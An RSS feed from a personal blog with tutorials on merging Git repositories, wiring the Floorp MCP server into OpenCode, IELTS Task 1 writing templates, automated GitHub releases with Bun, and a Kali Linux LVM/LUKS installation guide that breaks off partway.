<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>UmmIt Kin Personal website</title><description>The place where I share my thoughts and projects.</description><link>https://ummit.dev/</link><item><title>How to Merge Git Repositories While Preserving History</title><link>https://ummit.dev//posts/linux/tools/git/git-merge-repositories/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/git/git-merge-repositories/</guid><description>A guide to merging Git repositories using remote merge and subtree merge, keeping complete commit history intact.</description><pubDate>Thu, 19 Mar 2026 00:00:00 GMT</pubDate><content:encoded>## Introduction

If you manage multiple Git repositories and want to consolidate them into a single repository, you need to choose the right merge strategy.

This guide covers two main approaches:

- **Remote merge** for flat merging at the root level
- **Subtree merge** for organizing repos into subdirectories

Both methods preserve complete commit history, but they are suited for different use cases.

## Why Merge Repositories?

There are several reasons to merge repositories:

- consolidating related projects into a monorepo
- reorganizing code for better maintainability
- preserving historical context for future development
- reducing the overhead of managing multiple repos

## Requirements

Before starting, make sure:

- you have Git installed
- you have access to both source and target repositories
- you have backed up your repositories before attempting any merge

A backup can be as simple as:

```bash
git clone /path/to/repo /path/to/repo-backup
```

## Method 1: Remote Merge (Flat Structure)

This method merges two repositories at the root level.

The result is a single branch with both histories combined.

### When to Use Remote Merge

Use this method when:

- both repositories contain different files with minimal overlap
- you want a flat directory structure
- the repositories represent different aspects of the same project

### How Remote Merge Works

```bash
# In the target repository
cd /path/to/target-repo

# Add source repo as a remote
git remote add source-repo /path/to/source-repo

# Fetch commits from source
git fetch source-repo

# Merge with allow-unrelated-histories flag
git merge source-repo/master --allow-unrelated-histories -m &quot;merge: add source repo&quot;

# Clean up the remote
git remote remove source-repo
```

### Why `--allow-unrelated-histories`

By default, Git refuses to merge repositories with no common ancestor.

The `--allow-unrelated-histories` flag tells Git to proceed anyway.

This is safe when you intentionally want to combine two independent repos.

### Handling Conflicts

If both repositories have files with the same name, Git will report a conflict.

You need to choose which version to keep:

```bash
# Use the version from the source repo
git checkout --theirs conflicting-file.md

# Use the version from the target repo
git checkout --ours conflicting-file.md

# Stage the resolved file
git add conflicting-file.md

# Complete the merge
git commit
```

### Example: Merging a build-scripts repo into a project repo

Suppose you have:

- `project-repo` with application code
- `build-scripts` with CI/CD configuration

You can merge `build-scripts` into `project-repo`:

```bash
cd ~/repos/project-repo

git remote add build /home/user/repos/build-scripts
git fetch build
git merge build/main --allow-unrelated-histories -m &quot;merge: add build scripts&quot;

# If there is a conflict in README.md
git checkout --theirs README.md
git add README.md
git commit -m &quot;merge: add build scripts&quot;

git remote remove build
```

Result:

```text
*   a1b2c3d merge: add build scripts
|\
| * e4f5g6h docs: update build instructions
| * h7i8j9k feat: add Docker build
* k0l1m2n feat: add user authentication
* n3o4p5q fix: resolve login bug
```

Both histories are preserved and merged at a single point.

## Method 2: Subtree Merge (Directory Structure)

This method imports a repository into a subdirectory.

It keeps the imported repo organized and separated from the main repo content.

### When to Use Subtree Merge

Use this method when:

- you want to maintain a clear directory structure
- the imported repo represents a sub-project or module
- you need to organize multiple repos under different paths

### How Subtree Merge Works (Without Squashing)

```bash
# In the target repository
cd /path/to/target-repo

# Add repo as a subtree under a specific path
git subtree add --prefix=&quot;libs/module-name&quot; /path/to/source-repo main
```

This preserves all individual commits from the source repo.

### How Subtree Merge Works (With Squashing)

```bash
# Add repo as a subtree with squashed history
git subtree add --prefix=&quot;libs/module-name&quot; /path/to/source-repo main --squash
```

This condenses the entire history into a single commit.

### With or Without Squashing?

| Aspect | Without `--squash` | With `--squash` |
|--------|-------------------|----------------|
| Commit count | Full history preserved | Single commit |
| Use case | Important history | Large external libs |
| Clarity | Detailed timeline | Clean summary |

Use squashing when:

- importing third-party libraries
- the commit history is not relevant
- you want to keep the main branch clean

Skip squashing when:

- the commits contain valuable context
- you need to trace bug fixes or features
- the repo is part of active development

### Example: Organizing multiple repos into a monorepo

Suppose you have:

- `web-app` with frontend code
- `api-server` with backend code
- `shared-utils` with common utilities

You want to organize them under a single `monorepo`:

```bash
cd ~/repos/monorepo

# Add frontend under packages/frontend
git subtree add --prefix=&quot;packages/frontend&quot; ~/repos/web-app main

# Add backend under packages/backend
git subtree add --prefix=&quot;packages/backend&quot; ~/repos/api-server main

# Add utilities under packages/utils with squashed history
git subtree add --prefix=&quot;packages/utils&quot; ~/repos/shared-utils main --squash
```

Result:

```text
monorepo/
├── packages/
│   ├── frontend/  (full commit history from web-app)
│   ├── backend/   (full commit history from api-server)
│   └── utils/     (single squashed commit from shared-utils)
```

The commit graph shows separate branches for each subtree:

```text
*   x9y8z7 Add &apos;packages/utils/&apos; from commit &apos;a1b2c3&apos;
|\
| * a1b2c3 Squashed &apos;packages/utils/&apos; content
*   w6v5u4 Add &apos;packages/backend/&apos; from commit &apos;t3s2r1&apos;
|\
| * t3s2r1 feat: add user routes
| * q0p9o8 fix: database connection
*   n7m6l5 Add &apos;packages/frontend/&apos; from commit &apos;k4j3i2&apos;
|\
| * k4j3i2 feat: add login page
| * h1g0f9 feat: setup React app
* e8d7c6 docs: initial monorepo setup
```

## Moving Files After Subtree Merge

After importing a repo with subtree, you may want to reorganize files.

Use `git mv` to preserve history:

```bash
# Remove old version if it exists
git rm old-location/file.txt

# Move files with git mv
git mv source-dir/file.txt target-dir/file.txt

# Move all files in a directory
for item in source-dir/*; do
  git mv &quot;$item&quot; target-dir/
done

# Remove empty directory
rmdir source-dir

# Commit the reorganization
git commit -m &quot;refactor: reorganize project structure&quot;
```

## Using Remote URLs Instead of Local Paths

All examples above use local paths, but you can also use remote URLs:

```bash
# Remote merge with GitHub URL
git remote add source git@github.com:username/repo.git
git fetch source
git merge source/main --allow-unrelated-histories

# Subtree merge with GitHub URL
git subtree add --prefix=&quot;vendor/lib&quot; git@github.com:username/lib.git main
```

If you encounter authentication issues with HTTPS, use SSH instead:

```bash
# HTTPS (may require password)
git@github.com:username/repo.git

# SSH (uses SSH keys)
git@github.com:username/repo.git
```

## Comparison Table

| Feature | Remote Merge | Subtree (No Squash) | Subtree (Squashed) |
|---------|--------------|---------------------|-------------------|
| Directory structure | Flat (root) | Organized (subdir) | Organized (subdir) |
| Commit history | Full, interleaved | Full, separate | Single commit |
| Best for | Combining similar projects | Importing modules | Importing large libs |
| Complexity | Simple | Moderate | Simple |

## Troubleshooting

### Error: refusing to merge unrelated histories

Add `--allow-unrelated-histories`:

```bash
git merge source/main --allow-unrelated-histories
```

### Error: Authentication failed

Use SSH instead of HTTPS:

```bash
git@github.com:user/repo.git
```

### Conflict in binary files

Choose one version explicitly:

```bash
git checkout --theirs file.pdf
git add file.pdf
git commit
```

### Subtree command not found

Make sure you are using a recent version of Git:

```bash
git --version
```

`git subtree` is available in Git 1.7.11+.

## Best Practices

Before merging repositories, follow these best practices:

- **Always backup first** using `git clone`
- **Test locally** before pushing to remote
- **Use descriptive commit messages** explaining why you merged
- **Clean up temporary remotes** after merging
- **Document the merge** in your project README

Example cleanup:

```bash
git remote remove temp-remote
```

Example commit message:

```bash
git commit -m &quot;merge: consolidate frontend and backend repos for easier maintenance&quot;
```

## Conclusion

Merging Git repositories while preserving history is straightforward once you understand the two main methods:

- **Remote merge** combines repos at the root level
- **Subtree merge** organizes repos into subdirectories

Choose the method based on your project structure and whether individual commit history matters.

Always test merges locally first, handle conflicts carefully, and document the reasoning behind your merge decisions.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>How to use Floorp MCP Server with OpenCode</title><link>https://ummit.dev//posts/others/floorp-mcp-server-with-opencode/</link><guid isPermaLink="true">https://ummit.dev//posts/others/floorp-mcp-server-with-opencode/</guid><description>A quick guide to connect Floorp browser automation to OpenCode with a local MCP server using bunx.</description><pubDate>Tue, 17 Mar 2026 00:00:00 GMT</pubDate><content:encoded>## Introduction

If you are using [OpenCode](https://opencode.ai/) and want your coding agent to interact with the [Floorp browser](https://floorp.app/), you can connect them through the `floorp-mcp-server` package.

This MCP server is from the official Floorp project and is published in the [Floorp-Projects/floorp-mcp-server](https://github.com/Floorp-Projects/floorp-mcp-server) repository.

This setup allows OpenCode to use Floorp as an MCP tool for tasks such as listing tabs, reading page content, opening new tabs, navigating pages, and performing basic browser automation.

In this guide, I will show the exact setup I used with `bunx`.

## Requirements

Before starting, make sure you have:

- [Bun](https://bun.sh/) installed
- [Floorp](https://floorp.app/) installed
- OpenCode installed and working
- Floorp running before you try to use the MCP server

You also need to enable Floorp MCP support manually.

## Enable MCP inside Floorp

Open Floorp and go to:

```text
about:config
```

Then search for:

```text
floorp.mcp.enabled
```

Set it to:

```text
true
```

Without this option enabled, OpenCode will not be able to talk to Floorp even if the MCP server is configured correctly.

## OpenCode config location

For a global user-wide setup, OpenCode reads its config from:

```text
~/.config/opencode/opencode.json
```

You can also use a project-level `opencode.json`, but for a browser MCP like this, a global config usually makes more sense.

## Add Floorp MCP server to OpenCode

Edit your OpenCode config file and add the following:

```json
{
  &quot;$schema&quot;: &quot;https://opencode.ai/config.json&quot;,
  &quot;mcp&quot;: {
    &quot;floorp&quot;: {
      &quot;type&quot;: &quot;local&quot;,
      &quot;command&quot;: [&quot;bunx&quot;, &quot;floorp-mcp-server&quot;],
      &quot;enabled&quot;: true
    }
  }
}
```

### Why this config works

- `type: &quot;local&quot;` tells OpenCode this MCP server should be started as a local process
- `command` must be an array, not a plain string
- `bunx floorp-mcp-server` starts the published MCP package directly without a global install
- `enabled: true` makes the MCP server available when OpenCode starts

## Optional manual test

Before testing it through OpenCode, you can check whether the package starts correctly by running:

```bash
bunx floorp-mcp-server
```

If Floorp is running and MCP is enabled in `about:config`, the server should start normally.

## Restart OpenCode

After saving the config, restart OpenCode or open a new session.

Once loaded correctly, OpenCode should be able to access Floorp tools for actions such as:

- listing open tabs
- reading the current page
- opening a new tab
- navigating to another URL
- clicking elements on a page

## Use `/mcp` to list all MCP servers

If you want to quickly check whether OpenCode has loaded your MCP configuration, use the `/mcp` command inside OpenCode.

```text
/mcp
```

This lists the MCP servers available in the current session. If everything is configured correctly, you should see `floorp` in the list.

This is useful to confirm that:

- OpenCode read your config file successfully
- the MCP server is enabled
- the `floorp` MCP server is available to the current agent

![floorp connected](connected.png)

## Example prompt

You can test it with a simple prompt like this:

```text
Can you see my Floorp tabs? Use floorp.
```

Or:

```text
Open a new tab in Floorp and go to https://example.com. Use floorp.
```

## Troubleshooting

If it does not work, check these items first:

- Floorp is already running
- `floorp.mcp.enabled` is set to `true`
- `bunx floorp-mcp-server` can start without errors
- your OpenCode config is saved in `~/.config/opencode/opencode.json`
- the JSON syntax is valid

## Conclusion

That is all you need to connect Floorp MCP Server to OpenCode.

Using `bunx` keeps the setup simple, and once it is configured properly, OpenCode can directly interact with your browser through Floorp&apos;s MCP bridge.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>IELTS Writing 1 — 4 Paragraph Guide</title><link>https://ummit.dev//posts/others/ielts/</link><guid isPermaLink="true">https://ummit.dev//posts/others/ielts/</guid><description>IELTS writing task.</description><pubDate>Sun, 01 Mar 2026 00:00:00 GMT</pubDate><content:encoded># Paragraph 1 — Introduction

Purpose:

- What is it? One sentence that introduces the chart to the reader.
- Rewrite the chart title in one sentence.
- Important: Do not copy the title word-for-word. Keep this one sentence short.

## Point

- Never copy the title directly — rewrite it in your own words
- Use verbs like shows / illustrates / presents
- Use &quot;broken down by&quot; for categories
- Use &quot;in&quot; for years/locations, &quot;from ___ to ___&quot; for time ranges
- Keep it to one clean sentence

## Chart type vocabulary:

- Bar chart
- line graph
- pie chart
- table
- diagram

## Key Term Usage

| Term / Phrase | Use | Example |
|---|---|---|
| shows / illustrates / presents | Use to paraphrase the title | &quot;The chart shows sales by month.&quot; |
| broken down by / by / across | Use to say categories | &quot;broken down by age group&quot; |
| in / in the / for | Use to say time or place | &quot;in 2022&quot;, &quot;for the UK&quot; |

## The Formula

&gt; [Chart type] + [verb] + [what] + [broken down by category] + [time period/location]

## Starting the paragraph

- Overall, it is clear that...
- Overall, it is evident that...
- In general, it can be seen that...

Template:
&gt; The [chart type] shows/illustrates [what], broken down by [category], for/from [time period/location].

Example 1:
&gt; The bar chart shows the average weekly hours spent on exercise by men and women in three age groups in the UK in 2022.

Example 2:
&gt; The bar chart illustrates the proportion of household spending, broken down by food, rent, and leisure, in France, in 2018.

## Word-Boosting Templates — Intro

These longer openers help you hit the word count while still paraphrasing:

- Looking at the [chart type], we can see how much [subject] spent on [list of items] back in [year].
- The [chart type] gives information about the amount of [what] across [categories] in [location] in [year].
- The given [chart type] compares [what] between [group A] and [group B] in [year].

Example:
&gt; Looking at the bar chart, we can see how much people in France and the UK spent on five different items — cars, computers, books, perfume, and cameras — back in 2010.

# Paragraph 2 — Overview (2–3 sentences)

Purpose: Give the main trends, big picture, major point, most changedw. NO numbers.

Important: No numbers here. Only big patterns and comparisons.

## Describing trends

- ... is significantly higher than...
- ... is considerably lower than...
- ... remains relatively stable...
- ... fluctuates throughout...
- ... experiences a steady increase/decrease...
- ... reaches its peak in...
- ... hits its lowest point in...

## Comparing two things

- ... whereas ...
- ... while ...
- ... in contrast, ...
- However, ...
- On the other hand, ...

## Describing similarity

- Both ... and ... show/experience...
- Similarly, ...
- ... follows a similar pattern to ...

## Useful adjectives (no numbers!)

- significant / considerable
- slight / marginal
- steady / gradual
- dramatic / sharp
- overall / general
- Frequently

Template:
&gt; Overall, it is clear that [main trend]. Additionally / However, [second trend or comparison].

Example:
&gt; Overall, it is clear that men exercise more than women across all age groups. Additionally, activity falls with age for both sexes.

## Key Term Usage
| Term / Phrase | Use | Example |
|---|---|---|
| Overall, it is clear that... | Start the overview | &quot;Overall, it is clear that demand rose.&quot; |
| It is noticeable that... | Point to main idea | &quot;It is noticeable that urban areas grew.&quot; |
| The main trend is... | Say the biggest trend | &quot;The main trend is a steady increase.&quot; |
| remains relatively stable | Use for little change | &quot;Prices remain relatively stable.&quot; |

## Word-Boosting Templates — Overview

These phrases add natural length to your overview without using numbers:

- [Subject A] generally outspent / outperformed [Subject B] in [X] out of the [Y] areas.
- Both [groups] put the biggest slice of their [budget/time] toward [item].
- [Subject A] spent about [amount], while [Subject B] followed closely at around [amount].
- The only exception was [item], where [Subject B] actually [verb] more than [Subject A].
- From what can be seen in the data, ...

Example:
&gt; The UK generally outspent France in four out of the five areas. Both countries put the biggest slice of their budget toward cars.

### Example - Social Media Chart

- Teenagers use much more than adults
- Both groups use more on weekends
- Teenagers nearly double adults

# Paragraphs 3 &amp; 4 — Details (3–4 sentences each)

Purpose: Give specific numbers, units, and comparisons. Use two small groups of data (group A and group B). Descibe the data

What are they? These are where you describe the specific data and numbers from the chart.

- Para 3 = first subject / most notable data (e.g. the highest, the biggest trend)
- Para 4 = second subject / remaining data (e.g. the lowest, the other category)

Important: Always write the unit (%, $, hours). Check numbers carefully.

Template — Para 3:
&gt; In [group/time], [subject] stood at [number][unit]. This figure then [rose/fell] to [number] for [next group], and [declined/increased] to [number].

Template — Para 4:
&gt; By comparison / Meanwhile, [subject 2] stood at [number][unit] in [group/time]. This figure [dropped/rose] to [number] for [next group], and [fell/increased] further to [number].

Example:
&gt; In the 18–30 group, men exercised 8 hours per week. This fell to 5 hours for 31–50 year olds and to 3 hours for those 51 and over.
&gt; By comparison, women aged 18–30 exercised 6 hours per week. This dropped to 4 hours for 31–50 year olds and to 2 hours for those 51 and over.

## Key Term Table — Paragraphs 3 &amp; 4

### Introducing data

- In [year/month]...
- At its peak...
- At its lowest point...

### Describing numbers

- stood at... (e.g. &quot;rainfall stood at 80mm&quot;)
- accounted for...
- represented...
- reached approximately...

### Showing change

- increased / rose / climbed by [amount]
- decreased / fell / dropped by [amount]
- increased / rose to [number]
- remained stable at...

### Linking between points

- Meanwhile, ...
- In contrast, ...
- By comparison, ...
- Following this, ...
- Subsequently, ...
- Interestingly, ...

## Word-Boosting Templates — Details

These phrases add natural length and variety to your detail paragraphs:

### Highlighting a gap

- The most striking gap between the two [subjects] showed up in [item].
- The biggest difference can be seen in [item], where [A] [verb] more than double that of [B].

### Approximate values

- [Subject] hit nearly [amount] in this category.
- [Subject] stayed around [amount].
- ... coming in at [amount] compared to just [amount].
- ... which was roughly / approximately / nearly [amount].

### Exceptions &amp; contrast

- Interestingly, [item] was the only area where [B] actually [verb] more than [A].
- [Subject] clearly had a stronger preference for [item].

### Wrapping up a paragraph

- To wrap things up, ...
- Looking at the remaining categories, ...
- As for the other items, ...
- In terms of the remaining categories, ...

### &quot;while&quot; to compare in one sentence

- [A] spent [amount] on [item], while [B] only spent [amount].
- [A] [verb] [amount], while [B] followed closely at around [amount].

Example:
&gt; Interestingly, computers were the only area where the French actually spent more than British consumers. French buyers hit nearly £380,000 in this category, while British consumers stayed around £350,000. The most striking gap between the two nations showed up in camera sales — British consumers spent more than double that of the French, coming in at £360,000 compared to just £150,000.

## Key Term Usage — Paragraphs 3 &amp; 4

| Term / Phrase | Use | Example |
|---|---|---|
| stood at / was recorded at | Start a specific value | &quot;Exports stood at 50%.&quot; |
| rose / increased / climbed | Show increase | &quot;Sales rose to 200 units.&quot; |
| fell / decreased / dropped | Show decrease | &quot;Profit fell to $5,000.&quot; |
| remained stable / levelled off | No big change | &quot;The rate remained stable at 10%.&quot; |
| peaked at / reached its peak | Highest value | &quot;The figure peaked at 80%.&quot; |
| meanwhile / by comparison / in contrast | Compare groups | &quot;Meanwhile, women showed lower rates.&quot; |
| slightly less/more than | Small difference | &quot;6 hours, slightly less than men.&quot; |
| significantly higher/lower than | Big difference | &quot;is significantly higher than...&quot; |
| stood at X / accounted for X / reached X | Number phrases | &quot;stood at 30%, accounted for 20%&quot; |

## &quot;by&quot; vs &quot;to&quot;

**&quot;by&quot;** = the change amount
&gt; &quot;Rainfall increased **by** 20mm&quot; (it went up 20mm)

**&quot;to&quot;** = the final number
&gt; &quot;Rainfall increased **to** 80mm&quot; (it ended at 80mm)

Example:
&gt; &quot;In January, London&apos;s rainfall stood at 80mm, which was significantly higher than Paris at 45mm. London&apos;s rainfall subsequently rose to its peak of 120mm in November, an increase of 40mm from October.&quot;

### &quot;by&quot; vs &quot;to&quot; — Key Term Card

| | by | to |
|---|---|---|
| Means | the change amount | the final number |
| Question | &quot;how much?&quot; | &quot;how many now?&quot; |
| Example | rose by 50 units | rose to 200 units |
| Combined | rose by 50 units to 200 units | |

BY vs TO — Use in Details

| Word | Meaning | Example |
|---|---|---|
| by | Amount of change (difference) | &quot;rose by 10%&quot; |
| to | Final value (end point) | &quot;rose to 60%&quot; |
| both | Use both to show change and end | &quot;rose by 10% to 60%&quot; |

## Full Detail Paragraph Key Terms

### Introduce the number

- stood at...
- accounted for...
- reached...
- was recorded at...

### Going UP

- increased / rose / climbed / jumped by... to...

### Going DOWN

- decreased / fell / dropped / declined by... to...

### Staying same

- remained stable at...
- stayed constant at...

### Linking sentences

- Meanwhile, ...
- In contrast, ...
- By comparison, ...
- Following this, ...
- Subsequently, ...

# Short Checklist

- Minimum 150 words (aim 160–170).
- P1: paraphrase only (1 sentence).
- P2: big picture only — no numbers.
- P3 &amp; 4: use numbers, units and comparisons.
- Group similar data together. Do not list every number.
- Use a mix of short and long sentences.
- Leave 2–3 minutes to check numbers, units and grammar.

# Full 4-paragraph Sample Answers

## Sample 1 — Exercise by Age Group

Intro:
&gt; The bar chart shows the average hours of exercise per week by men and women in three age groups in the UK in 2022.

Overview:
&gt; Overall, men exercise more than women in all age groups. Activity falls with age for both sexes.

Details 1:
&gt; In the 18–30 group, men exercised 8 hours per week. This fell to 5 hours for 31–50 year olds and to 3 hours for those 51 and over.

Details 2:
&gt; By comparison, women aged 18–30 exercised 6 hours per week. This dropped to 4 hours for 31–50 year olds and to 2 hours for those 51 and over.

## Sample 2 — France vs UK Consumer Spending

Intro:
&gt; Looking at the bar chart, we can see how much people in France and the UK spent on five different items — cars, computers, books, perfume, and cameras — back in 2010.

Overview:
&gt; From what can be seen in the data, the UK generally outspent France in four out of the five areas. Both countries put the biggest slice of their budget toward cars. The UK spent about £450,000 on them, while France followed closely at around £400,000.

Details 1:
&gt; Interestingly, computers were the only area where the French actually spent more than people in the UK. France hit nearly £380,000 in this category, while the UK stayed around £350,000. The most striking gap between the two nations showed up in camera sales. In that market, the UK spent more than double what France did, coming in at £360,000 compared to just £150,000.

Details 2:
&gt; To wrap things up, even though the UK spent more on books, France clearly had a stronger preference for perfume. They spent £200,000 on it, while the UK only spent £140,000.

## Sample 2

Para 1

Intro &quot;The bar chart illustrates the average hours per week spent on exercise, broken down by men and women across three age groups, in the UK in 2022.&quot;

Para 2

Overview &quot;Overall, it is evident that men exercise significantly more than women across all age groups. Additionally, the 18–30 age group shows the highest levels of physical activity, while older age groups tend to exercise less.&quot;

Para 3

Men &quot;In the 18–30 age group, men&apos;s exercise hours stood at 8 hours per week, representing the highest figure across all groups. This subsequently fell to 5 hours among 31–50 year olds, a decrease of 3 hours. This declined further to just 3 hours for those aged 51 and over, making it the lowest recorded figure for men.&quot;

Para 4

Women &quot;Meanwhile, women in the 18–30 age group stood at 6 hours per week, slightly lower than their male counterparts. This subsequently fell to 4 hours among 31–50 year olds. This declined further to only 2 hours for those aged 51 and over, the lowest figure overall across both genders.&quot;</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Automated GitHub Releases with Bun, Bumpp, and Changelogithub</title><link>https://ummit.dev//posts/web/bun-package-manager/bun-for-git-release/</link><guid isPermaLink="true">https://ummit.dev//posts/web/bun-package-manager/bun-for-git-release/</guid><description>Automate version bumping and GitHub release creation with changelog generation using Bun, bumpp, and changelogithub.</description><pubDate>Fri, 16 Jan 2026 00:00:00 GMT</pubDate><content:encoded>## Introduction

Ever wanted to automate your GitHub releases with auto-generated changelogs based on your commit messages? With **Bun**, **bumpp**, and **changelogithub**, you can create professional releases in seconds !!! no manual changelog writing required!

## Prerequisites

Before getting started, make sure you have the following tools:

- [Bun](https://bun.sh/) — A fast JavaScript runtime
- [bumpp](https://github.com/antfu/bumpp) — Interactive version bumping
- [changelogithub](https://github.com/antfu/changelogithub) — GitHub release notes generator

Install bumpp as a dev dependency:

```bash
bun add -D bumpp
```

## Setup

Add a release script to your `package.json`:

```json
{
  &quot;scripts&quot;: {
    &quot;release&quot;: &quot;bumpp&quot;
  }
}
```

## Bump the Version and Create a Tag

Run the release command:

```bash
bun run release
```

You&apos;ll see an interactive prompt like this:

```
✔ Current version 1.4.1 ›         patch 1.4.2

   files package.json
  commit chore: release v1.4.2
     tag v1.4.2
    push yes

    from 1.4.1
      to 1.4.2

✔ Bump? … yes
✔ Git commit
✔ Git tag
✔ Git push
```

This will:

1. Update the version in `package.json`
2. Create a git commit with message `chore: release vX.X.X`
3. Create a git tag `vX.X.X`
4. Push everything to your remote repository

## Step 2: Generate the Changelog

Now, let&apos;s generate the changelog and create a GitHub release:

```bash
bunx changelogithub
```

### No Previous Tag to Compare

If this is your **first release**, you&apos;ll likely encounter this error:

```
fatal: ambiguous argument &apos;c46318bd...v1.4.2&apos;: unknown revision or path not in the working tree.
```

**Why does this happen?**

This error occurs because `changelogithub` tries to compare the current tag with the previous tag to generate a changelog. Since this is your first release, there&apos;s no previous tag to compare against.

**Solution:** Manually specify the starting commit using the `--from` flag:

```bash
bunx changelogithub --from c46318b
```

To find your initial commit hash:

```bash
git log --oneline | tail -1
```

### Error 2: No GitHub Token Found

After fixing the first error, you might encounter this:

```
No GitHub token found, specify it via GITHUB_TOKEN env. Release skipped.
```

**Why does this happen?**

Since we&apos;re running `changelogithub` locally (without GitHub Actions), it needs a GitHub token to authenticate and create the release on your behalf.

**Solution:** Create and export a GitHub Personal Access Token.

#### How to Get a GitHub Token

1. Go to **GitHub** → **Settings** → **Developer settings** → **Personal access tokens** → **Tokens (classic)**
2. Click **&quot;Generate new token (classic)&quot;**
3. Give it a name (e.g., `changelogithub`)
4. Select the scope:
   - `public_repo` — for public repositories
   - `repo` — for private repositories
5. Click **&quot;Generate token&quot;** and copy it

#### Export the Token

Add the token to your current shell session:

```bash
export GITHUB_TOKEN=ghp_xxxxxxxxxxxxxxxxxxxx
```

&gt; **Tip:** Add this line to your `~/.zshrc` or `~/.bashrc` for permanent access.

## Now Run Again!

Now run the command again with both fixes:

```bash
bunx changelogithub --from c46318b
```

You should see output like this:

```
changelogithub v14.0.0
c46318b -&gt; v1.4.2 (224 commits)
--------------

### 🚨 Breaking Changes
- Update package manager to use bun or bunx

### 🚀 Features
- Add Friends page
- Add Gear page
- **OG-Image**: Add Open Graph image generation

### 🐞 Bug Fixes
- Missing thumbnail
- Correct spelling errors

##### View changes on GitHub

--------------
Creating release notes...
Released on https://github.com/username/repo/releases/tag/v1.4.2
```

Your release is now live on GitHub with a beautifully formatted changelog!

## Automate with GitHub Actions

Want to skip the manual token setup entirely? Use GitHub Actions to automate the entire process!

Create `.github/workflows/release.yml`:

```yaml
name: Release

on:
  push:
    tags:
      - &apos;v*&apos;

jobs:
  release:
    runs-on: ubuntu-latest
    permissions:
      contents: write
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0

      - name: Setup Bun
        uses: oven-sh/setup-bun@v1

      - name: Generate Changelog &amp; Release
        run: bunx changelogithub
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
```

Now your workflow is:

1. Run `bun run release` locally
2. GitHub Actions automatically generates the changelog and creates the release

&gt; **Note:** `secrets.GITHUB_TOKEN` is automatically provided by GitHub Actions — no manual setup required!

---

## Command Reference

| Command | Purpose |
|---------|---------|
| `bun run release` | Bump version, commit, tag, and push |
| `bunx changelogithub` | Generate changelog and create GitHub release |
| `bunx changelogithub --from &lt;commit&gt;` | First release (specify starting commit) |
| `bunx changelogithub --dry` | Preview changelog without publishing |

---

## References

- [bumpp](https://github.com/antfu/bumpp) — Version bumping tool by Anthony Fu
- [changelogithub](https://github.com/antfu/changelogithub) — Changelog generator by Anthony Fu
- [Conventional Commits](https://www.conventionalcommits.org/) — Commit message specification</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Kali Linux with Manual Partitioning, LVM, and LUKS Encryption</title><link>https://ummit.dev//posts/linux/distribution/kali/kali-manualy-lvm-luks-installation-guide/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/distribution/kali/kali-manualy-lvm-luks-installation-guide/</guid><description>Kali Linux with manual LVM partitioning with LVM and LUKS encryption.</description><pubDate>Sun, 02 Feb 2025 00:00:00 GMT</pubDate><content:encoded>## Introduction

This article is a comprehensive guide to installing Kali Linux with manual LVM partitioning. The steps outlined here will help you set up Kali Linux with Logical Volume Management (LVM) and LUKS encryption. Here are the results when you successfully complete the installation:

![done](./featured.png)

### What the fuck?

Before I started this guide, I was unsure whether I should write it or not. I mean, using a GUI to install is really easy and doesn’t seem to need a guide. But when I tried to install it, I found the Debian installer to be quite challenging and hard to use. Like Linus Torvalds said, `The Debian installer is really hard to use.`

So, I decided to write this guide to help you install Kali Linux with LVM and LUKS encryption.

I did a lot of research on Kali Linux LVM installation with LUKS, but unfortunately, I couldn’t find any articles or guides available online. I had to figure it out on my own. Two weeks ago, I spent a day and a half trying to figure out how to install Kali Linux with LVM and LUKS. Now, I’m sharing my experience with you! :)

## Let’s Get Started

I won’t go through the very basics, like how to download the ISO, create a bootable USB, boot from the USB, or set up a new VM. I’ll start from the boot screen of the Kali Linux installer, and this will be my starting point.

![started](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2025-02-02-200312_hyprshot.png)

## 1. Basic Setup

The basic setup should be pretty easy—just follow the instructions on the screen. You&apos;ll need to configure a few things like the language, location, keyboard layout, network settings, user account, and password. Just take it step by step, and you’ll be good to go!

![Select a language](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/1_basic/1_Select a language.png)

![Select your location](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/1_basic/2_Select your location.png)

![Configure locales](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/1_basic/3_Configure locales.png)

![Configure the keyboard](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/1_basic/4_Configure the keyboard.png)

![Load installer components from installation media](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/1_basic/5_Load installer components from installation media.png)

![Configure the network](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/1_basic/6_Configure the network.png)

![Set up users and passwords 1](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/1_basic/8_1_Set up users and passwords.png)
![Set up users and passwords 2](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/1_basic/8_2_Set up users and passwords.png)
![Set up users and passwords 3](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/1_basic/8_3_Set up users and passwords.png)

![Detect partition disks](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/1_detect partition disks.png)

## 2. Partition Disks and Configure LVM

This is the most important part of this guide. I will show you a very detailed step to create an LVM partition with LUKS encryption. Let’s start by clicking on `Manual` on the partition disks screen.

![Manual partitioning](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/2_Manual.png)

### 2.1. GPT Partition Table Creation

Since I was using a KVM virtual machine, this is the initial partition choice screen. Go ahead and click on `Virtual disk 1 (vda)`.

![Initial partition choice 1](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/3_initial partition choice.png)

Now, it will ask you if you want to create a new empty partition table on this device. Click on `Yes`.

![Initial partition choice 2](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/3_2_initial partition choice.png)

You should now see a new free space partition table created on the device. Click on this free space, and we will proceed to create a new partition.

![Select new block device](https://dl.ummit.dev/Kali-manual-lvm-installation-guide/2_partition/4_select new block device.png)

### 2.2. Create ESP Partition

